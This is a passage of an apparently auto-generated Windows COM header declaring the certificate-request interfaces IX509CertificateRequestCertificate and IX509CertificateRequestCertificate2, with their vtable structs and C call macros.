#define IX509CertificateRequestCertificate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCertificate_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCertificate_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCertificate_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCertificate_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCertificate_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCertificate_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCertificate_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCertificate_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCertificate_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCertificate_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCertificate_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCertificate_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCertificate_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCertificate_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCertificate_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestCertificate_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestCertificate_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestCertificate_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestCertificate_CheckPublicKeySignature(This,pPublicKey)	\
    ( (This)->lpVtbl -> CheckPublicKeySignature(This,pPublicKey) ) 

#define IX509CertificateRequestCertificate_get_Issuer(This,ppValue)	\
    ( (This)->lpVtbl -> get_Issuer(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_Issuer(This,pValue)	\
    ( (This)->lpVtbl -> put_Issuer(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_NotBefore(This,pValue)	\
    ( (This)->lpVtbl -> get_NotBefore(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_NotBefore(This,Value)	\
    ( (This)->lpVtbl -> put_NotBefore(This,Value) ) 

#define IX509CertificateRequestCertificate_get_NotAfter(This,pValue)	\
    ( (This)->lpVtbl -> get_NotAfter(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_NotAfter(This,Value)	\
    ( (This)->lpVtbl -> put_NotAfter(This,Value) ) 

#define IX509CertificateRequestCertificate_get_SerialNumber(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SerialNumber(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_put_SerialNumber(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SerialNumber(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCertificate_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate2_INTERFACE_DEFINED__
#define __IX509CertificateRequestCertificate2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCertificate2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCertificate2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35a-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCertificate2 : public IX509CertificateRequestCertificate
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPrivateKeyTemplate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCertificate2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCertificate2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *CheckPublicKeySignature )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKeyTemplate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        END_INTERFACE
    } IX509CertificateRequestCertificate2Vtbl;

    interface IX509CertificateRequestCertificate2
    {
        CONST_VTBL struct IX509CertificateRequestCertificate2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCertificate2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCertificate2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCertificate2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCertificate2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCertificate2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCertificate2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCertificate2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


